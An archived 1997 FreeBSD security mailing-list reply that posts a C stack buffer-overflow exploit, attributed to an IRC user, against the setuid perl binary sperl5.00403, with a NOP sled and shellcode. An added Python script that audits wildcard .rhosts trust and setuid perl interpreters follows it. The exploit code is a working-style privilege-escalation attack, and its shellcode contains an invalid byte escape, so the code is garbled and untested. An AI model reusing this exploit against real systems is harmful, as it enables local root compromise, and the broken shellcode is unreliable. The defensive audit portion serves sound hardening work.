Date: Wed, 30 Jul 1997 14:44:02 -0400
From: Patrick Gilbert <gilbertp@videotron.com>
To: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
Message-ID: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca>
In-Reply-To: <Pine.BSF.3.95.970728172339.3844N-100000@mail.MCESTATE.COM>
References: <Pine.BSF.3.95q.970728184930.26434E-100000@netrail.net>
At 17:27 97-07-28 -0700, you wrote:
> Just an update on how the break-in was done after the hacker was
> confronted on irc.
>
> Apparently FreeBSD ships with .rhosts in the root account. Using
> this and perl5.00401, the user was able to rlogin onto the other machine
> without using a password.

After a brief discussion with TheCa on Efnet, he dcc'd me his famous
exploit for a transcript of his brief moment of fame on this discussion
list.

/* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl exploit by Ovx */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE 1400
#define OFFSET 600

char *get_esp(void)
{
    asm("movl %esp,%eax");
}

char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
    int i;
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    for(i=0+1;i<BUFFER_SIZE-4;i+=4)
        *(char **)&buf[i] = get_esp() - OFFSET;
    memset(buf,0x90,768+1);
    memcpy(&buf[768+1],execshell,strlen(execshell));
    buf[BUFFER_SIZE-1]=0;
    execl("/usr/bin/sperl5.00403", "/usr/bin/sperl5.00403", buf, NULL);
}

I haven't had time to try it, so this may not work. Then again, he may
be lying. Then again, do we really care ?? Bah.

Patrick
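The thread names two conditions that together made the break-in possible: an over-trusting .rhosts on the root account, which lets rlogin in without a password, and a setuid perl interpreter (sperl) that an unprivileged user can hand an oversized argument. The audit script below is an added example written for this archive page, not code from the mail, from TheCa, or from FreeBSD. It flags rhosts-style entries that use the "+" wildcard and flags setuid files whose name begins with "sperl" or "suidperl"; the sample .rhosts text, the interpreter name prefixes and the default directory list are constructed assumptions, and the real-filesystem walk is confined to the `audit()` function so the parsing and classification logic can be exercised offline.

```python
#!/usr/bin/env python3
"""Audit helpers for the two weaknesses discussed in the thread:
wildcard trust in ~root/.rhosts (or /etc/hosts.equiv), and setuid perl
interpreters reachable by unprivileged users.  Added example; not part
of the original mail."""
import os
import stat

# Constructed sample of an over-permissive .rhosts (not from the mail).
SAMPLE_RHOSTS = """\
+ +
trusted.example.com root
workstation.example.com
-untrusted.example.com
"""

# Assumed name prefixes for setuid perl interpreters on 1990s systems.
SETUID_INTERPRETER_PREFIXES = ("sperl", "suidperl")


def parse_rhosts(text):
    """Parse .rhosts/hosts.equiv text into (host, user) tuples.

    Each non-blank line is 'host [user]'.  A missing user means the same
    remote user name may log in as the account that owns the file.
    """
    entries = []
    for raw in text.splitlines():
        fields = raw.split()
        if not fields:
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        entries.append((host, user))
    return entries


def risky_rhosts_entries(text):
    """Return entries that grant passwordless access too broadly:
    '+' as host (any host), '+@group' (any host in a netgroup), or '+'
    as user (any remote user).  Deny entries (leading '-') are skipped."""
    risky = []
    for host, user in parse_rhosts(text):
        if host.startswith("-"):
            continue
        if host == "+" or host.startswith("+@") or user == "+":
            risky.append((host, user))
    return risky


def setuid_interpreters(file_modes):
    """Given (path, st_mode) pairs, return paths of regular files that are
    setuid or setgid and named like a setuid perl interpreter."""
    hits = []
    for path, mode in file_modes:
        if not stat.S_ISREG(mode):
            continue
        if not mode & (stat.S_ISUID | stat.S_ISGID):
            continue
        if os.path.basename(path).startswith(SETUID_INTERPRETER_PREFIXES):
            hits.append(path)
    return hits


def walk_modes(top):
    """Yield (path, st_mode) for every file under `top`, not following symlinks."""
    for dirpath, _dirnames, filenames in os.walk(top):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                yield full, os.lstat(full).st_mode
            except OSError:
                continue  # unreadable entry; skip rather than abort the audit


def audit(root_home="/root", bin_dirs=("/usr/bin", "/usr/local/bin")):
    """Run both checks against the live system; paths are assumptions."""
    report = {"rhosts": [], "setuid_perl": []}
    for fname in (os.path.join(root_home, ".rhosts"), "/etc/hosts.equiv"):
        try:
            with open(fname) as fh:
                risky = risky_rhosts_entries(fh.read())
        except OSError:
            continue  # file absent or unreadable: nothing to flag
        report["rhosts"].extend((fname, host, user) for host, user in risky)
    for directory in bin_dirs:
        report["setuid_perl"].extend(setuid_interpreters(walk_modes(directory)))
    return report


if __name__ == "__main__":
    print("risky entries in sample:", risky_rhosts_entries(SAMPLE_RHOSTS))
    print("live audit:", audit())
```

Run as root to read ~root/.rhosts; a non-empty `rhosts` list or any path in `setuid_perl` is a finding. Removing the setuid bit from the interpreter (or the interpreter itself) and deleting wildcard trust entries addresses both conditions the thread describes.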
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3.0.2.32.19970730144402.006c5dd4>